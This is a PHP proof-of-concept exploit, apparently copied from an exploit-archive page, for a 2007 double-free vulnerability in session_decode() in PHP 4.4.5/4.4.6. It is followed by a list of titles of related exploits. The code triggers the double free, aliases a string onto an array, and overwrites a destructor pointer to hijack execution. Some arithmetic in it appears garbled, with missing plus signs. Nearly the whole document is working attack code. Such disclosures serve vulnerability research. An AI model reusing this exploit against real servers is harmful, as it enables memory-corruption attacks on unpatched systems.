<?php

////////////////////////////////////////////////////////////////////////

// _ _ _ _ ___ _ _ ___ //

// | || | __ _ _ _ __| | ___ _ _ ___ __| | ___ | _ | || || _ //

// | __ |/ _` || '_|/ _` |/ -_)| ' / -_)/ _` ||___|| _/| __ || _/ //

// |_||_|__,_||_| __,_|___||_||_|___|__,_| |_| |_||_||_| //

// //

// Proof of concept code from the Hardened-PHP Project //

// (C) Copyright 2007 Stefan Esser //

// //

////////////////////////////////////////////////////////////////////////

// PHP 4.4.5/4.4.6 session_decode() Double Free Vulnerability //

//////////////////////////////////////////////////////////////////////// // This is meant as a protection against remote file inclusion.

die("REMOVE THIS LINE"); ini_set("session.serialize_handler", "php");

session_start(); $varname = str_repeat("D", 39);

$$varname = &$_SESSION; // Trigger the double free

session_decode($varname.'|i:0;');

$_________________x = "AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJ";

$_________________a = array("OneElement"); // Now x and a point to the same memory. Therefore x can be used to modify a // Overwrite pointer to the destructor

$_________________x[8*4 0] = chr(0x55);

$_________________x[8*4 1] = chr(0x66);

$_________________x[8*4 2] = chr(0x77);

$_________________x[8*4 3] = chr(0x88);

// Trigger the destruction

unset($_________________a);

?>

【PHP 4.4.5 / 4.4.6 session_decode() Double Free Exploit PoC】相关文章：

★ Xerox Phaser 8400 (reboot) Remote Denial of Service Exploit

★ Yourownbux 4.0 (COOKIE) Authentication Bypass Exploit

★ The Personal FTP Server 6.0f RETR Denial of Service Exploit

★ Discuz! 6.0.1 (searchid) Remote SQL Injection Exploit

★ Dana IRC 1.4a Remote Buffer Overflow Exploit

★ Quicksilver Forums 1.4.1 forums[] Remote SQL Injection Exploit

★ Wordpress 2.6.1 (SQL Column Truncation) Admin Takeover Exploit

★ webEdition CMS (we_objectID) Blind SQL Injection Exploit

★ Yahoo Messenger 8.1 ActiveX Remote Denial of Service Exploit

★ NaviCOPA Web Server 2.01 Remote Buffer Overflow Exploit (meta)